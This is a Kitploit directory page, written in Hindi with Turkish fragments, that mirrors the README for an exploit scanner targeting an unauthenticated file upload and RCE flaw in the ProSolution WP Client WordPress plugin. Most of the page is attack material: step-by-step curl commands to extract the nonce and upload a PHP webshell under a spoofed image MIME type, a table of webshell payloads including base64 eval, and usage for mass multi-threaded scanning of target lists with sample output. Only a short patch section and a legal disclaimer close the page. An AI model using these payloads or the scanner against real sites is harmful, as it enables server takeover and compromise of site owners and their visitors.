Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-2942 — प्रोसोल्यूशन WP क्लाइंट (CVE-2026-2942) में बिना प्रमाणीकरण के मनमानी फ़ाइल अपलोड और दूरस्थ कोड निष्पादन के लिए स्वचालित स्कैनर। मल्टी-थ्रेडेड स्कैनिंग, MIME स्पूफिंग, शेल सत्यापन, और पैठ परीक्षण के लिए प्रॉक्सी समर्थन प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/xxconi/cve-2026-2942
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubxxconi/cve-2026-2942

CVE-2026-2942

प्रोसोल्यूशन WP क्लाइंट (CVE-2026-2942) में बिना प्रमाणीकरण के मनमानी फ़ाइल अपलोड और दूरस्थ कोड निष्पादन के लिए स्वचालित स्कैनर। मल्टी-थ्रेडेड स्कैनिंग, MIME स्पूफिंग, शेल सत्यापन, और पैठ परीक्षण के लिए प्रॉक्सी समर्थन प्रदान करता है।

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ProSolution WP Client — अप्रमाणित फ़ाइल अपलोड और RCE स्कैनर

प्लगइन: prosolution-wp-client
प्रभावित संस्करण: <= 1.9.9
भेद्यता प्रकार: अप्रमाणित मनमाना फ़ाइल अपलोड → रिमोट कोड निष्पादन
जोखिम स्तर: 🔴 गंभीर (CVSS 9.8)
आवश्यकता: [prosolfrontend] शॉर्टकोड युक्त सार्वजनिक पृष्ठ


📌 भेद्यता के बारे में

ProSolution WP Client प्लगइन का proSol_fileUploadProcess AJAX एक्शन, अपलोड की गई फ़ाइलों के MIME प्रकार की जाँच करता है लेकिन एक्सटेंशन को सत्यापित नहीं करता। हमलावर .php एक्सटेंशन वाली फ़ाइल को image/jpeg MIME प्रकार के साथ भेजकर सर्वर पर बिना प्रमाणीकरण के वेबशेल अपलोड कर सकता है।

हमला श्रृंखला

root@kitploit:~
[prosolfrontend] shortcode sayfası
        │
        ▼
1. prosolObj.nonce → public sayfadan çekilir (kimlik doğrulama gerekmez)
        │
        ▼
2. POST /wp-admin/admin-ajax.php
   action=proSol_fileUploadProcess
   security=<nonce>
   files[]=shell.php  (Content-Type: image/jpeg)  ← MIME Spoofing
        │
        ▼
3. /wp-content/uploads/prosolwpclient/[random].php olarak kaydedilir
        │
        ▼
4. GET /wp-content/uploads/prosolwpclient/[random].php?cmd=id
        │
        ▼
5. uid=33(www-data) → Unauthenticated RCE ✓

🧪 प्रमाण का अवधारणा (मैनुअल)

⚠️ अस्वीकरण: यह PoC केवल शैक्षिक और रक्षात्मक सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। केवल उन प्रणालियों पर उपयोग करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।

पूर्वापेक्षाएँ

  • WordPress स्थापित और prosolution-wp-client प्लगइन सक्रिय (संस्करण <= 1.9.9)
  • [prosolfrontend] शॉर्टकोड युक्त एक प्रकाशित WordPress पृष्ठ

चरण 1 — Nonce प्राप्त करना

[prosolfrontend] शॉर्टकोड युक्त किसी भी सार्वजनिक पृष्ठ पर जाएँ और स्रोत कोड से prosolObj.nonce मान निकालें:

root@kitploit:~
TARGET="https://target.example.com"

NONCE=$(curl -s "$TARGET/jobs" \
  | grep -oP '"nonce"\s*:\s*"\K[^"]+')

echo "Extracted nonce: $NONCE"

स्रोत कोड में खोजने योग्य संरचना:

root@kitploit:~
<script id='prosolwpclient-public-js-extra'>
var prosolObj = {
    "ajaxurl": "https://target.example.com/wp-admin/admin-ajax.php",
    "nonce": "a1b2c3d4e5",
    ...
};
</script>

चरण 2 — PHP वेबशेल बनाना

root@kitploit:~
echo '<?php system($_GET["cmd"]); ?>' > /tmp/shell.php

चरण 3 — MIME स्पूफिंग के साथ अपलोड करना

.php फ़ाइल को image/jpeg Content-Type के साथ भेजें:

root@kitploit:~
curl -s -X POST "$TARGET/wp-admin/admin-ajax.php" \
  -F "action=proSol_fileUploadProcess" \
  -F "security=$NONCE" \
  -F "files[]=@/tmp/shell.php;type=image/jpeg" \
  | python3 -m json.tool

अपेक्षित प्रतिक्रिया:

root@kitploit:~
{
  "files": [
    {
      "name": "shell.php",
      "size": 31,
      "url": "https://target.example.com/wp-content/uploads/prosolwpclient/shell.php",
      "newfilename": "a3f8b2c1d9e4f7g2.php",
      "rename_status": true,
      "extension": "php"
    }
  ]
}

"extension": "php" और "rename_status": true → .php फ़ाइल सफलतापूर्वक सहेजी गई।


चरण 4 — RCE ट्रिगर करना

root@kitploit:~
SHELL_FILE="a3f8b2c1d9e4f7g2.php"   # Adım 3'teki newfilename

curl -s "$TARGET/wp-content/uploads/prosolwpclient/$SHELL_FILE?cmd=id"

अपेक्षित आउटपुट:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

✅ अप्रमाणित RCE प्राप्त हुआ।


🛠️ स्वचालित स्कैनर स्थापना

root@kitploit:~
git clone https://github.com/kullanici/prosol-upload-scanner
cd prosol-upload-scanner
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests

🚀 उपयोग

एकल लक्ष्य

root@kitploit:~
python prosol_upload.py -u http://hedef.com

शेल सत्यापन के साथ

root@kitploit:~
python prosol_upload.py -u http://hedef.com --verify --verify-cmd "whoami"

सामूहिक स्कैनिंग

root@kitploit:~
python prosol_upload.py -l targets.txt -t 20 -o sonuclar.txt

प्रॉक्सी के साथ (Burp Suite)

root@kitploit:~
python prosol_upload.py -u http://hedef.com --proxy http://127.0.0.1:8080

कस्टम शेल प्रकार

root@kitploit:~
python prosol_upload.py -u http://hedef.com --shell-type full

⚙️ पैरामीटर

पैरामीटरसंक्षिप्तविवरणडिफ़ॉल्ट
--url-uएकल लक्ष्य URL—
--list-lलक्ष्य सूची फ़ाइल—
--threads-tथ्रेड संख्या10
--output-oआउटपुट फ़ाइलuploaded.txt
--shell-name—अपलोड की जाने वाली फ़ाइल का नामshell.php
--shell-type—शेल प्रकारsystem
--verify—अपलोड के बाद RCE परीक्षणFalse
--verify-cmd—सत्यापन कमांडid
--proxy—प्रॉक्सी URL—
--timeout—अनुरोध टाइमआउट (सेकंड)10

💀 शेल प्रकार

प्रकारपेलोडविवरण
system<?php system($_GET["cmd"]); ?>मूल सिस्टम कमांड
passthru<?php passthru($_GET["cmd"]); ?>कच्चा आउटपुट
exec<?php echo exec($_GET["cmd"]); ?>मौन निष्पादन
assert<?php assert($_POST["cmd"]); ?>POST के साथ eval
b64<?php eval(base64_decode($_POST["cmd"])); ?>बेस64 अस्पष्टीकरण
fullshell_exec + system + exec fallbackपूर्ण-सुविधा शेल

📂 शेल अपलोड स्थान

root@kitploit:~
WordPress Kök/
└── wp-content/
    └── uploads/
        └── prosolwpclient/
            └── [random_hex].php   ← Shell burada

📊 स्कैनर आउटपुट स्थितियाँ

स्थितिविवरण
★ UPLOADEDशेल सफलतापूर्वक अपलोड हुआ
✓ RCE OKशेल सत्यापित हुआ, कमांड चला
- BLOCKEDसर्वर ने PHP एक्सटेंशन को ब्लॉक किया
~ TIMEOUTकनेक्शन टाइमआउट
~ CONN_ERRकनेक्शन त्रुटि
! HTTP_ERRHTTP त्रुटि कोड

🖥️ नमूना स्कैनर आउटपुट

root@kitploit:~
[*] 3 hedef | ProSolution File Upload | threads=10

[★ UPLOADED ] http://hedef1.com
  Shell URL : http://hedef1.com/wp-content/uploads/prosolwpclient/a3f8b2c1d9.php
  Yeni Ad   : a3f8b2c1d9.php  (renamed=True)
  [✓ RCE OK ] cmd çıktısı: uid=33(www-data) gid=33(www-data)

[- BLOCKED  ] http://hedef2.com  ext=jpeg
[~ TIMEOUT  ] http://hedef3.com

───────────────────────────────────────────────
  UPLOADED            :    1  █
  BLOCKED             :    1  █
  TIMEOUT             :    1  █
───────────────────────────────────────────────
  Yüklenen shell'ler → uploaded.txt
───────────────────────────────────────────────

🛡️ बचाव / पैच

उपायकार्यान्वयन
PHP निष्पादन अवरोधuploads/ निर्देशिका में .htaccess जोड़ें
प्लगइन अद्यतनसंस्करण > 1.9.9 पर अपग्रेड करें या हटाएँ
एक्सटेंशन श्वेतसूचीसर्वर-साइड पर केवल अनुमत एक्सटेंशन
MIME सत्यापनfinfo_file() के साथ वास्तविक सामग्री जाँच
WAF नियम.php अपलोड अनुरोधों को ब्लॉक करें

uploads/ निर्देशिका के लिए .htaccess:

root@kitploit:~
<FilesMatch "\.php$">
    Deny from all
</FilesMatch>

⚠️ कानूनी चेतावनी

यह उपकरण और PoC केवल अधिकृत प्रणालियों पर, शैक्षिक उद्देश्यों और पैठ परीक्षण के दायरे में उपयोग के लिए तैयार किया गया है।
अनधिकृत प्रणालियों पर इसका उपयोग तुर्की दंड संहिता के अनुच्छेद 243-245 और अंतर्राष्ट्रीय साइबर अपराध कानूनों के तहत अपराध माना जाता है।
डेवलपर उपकरण के दुरुपयोग से उत्पन्न किसी भी कानूनी जिम्मेदारी को स्वीकार नहीं करता है।


📄 लाइसेंस

MIT लाइसेंस — केवल शिक्षा और अनुसंधान प्रयोजनों के लिए।

टूल डाउनलोड करें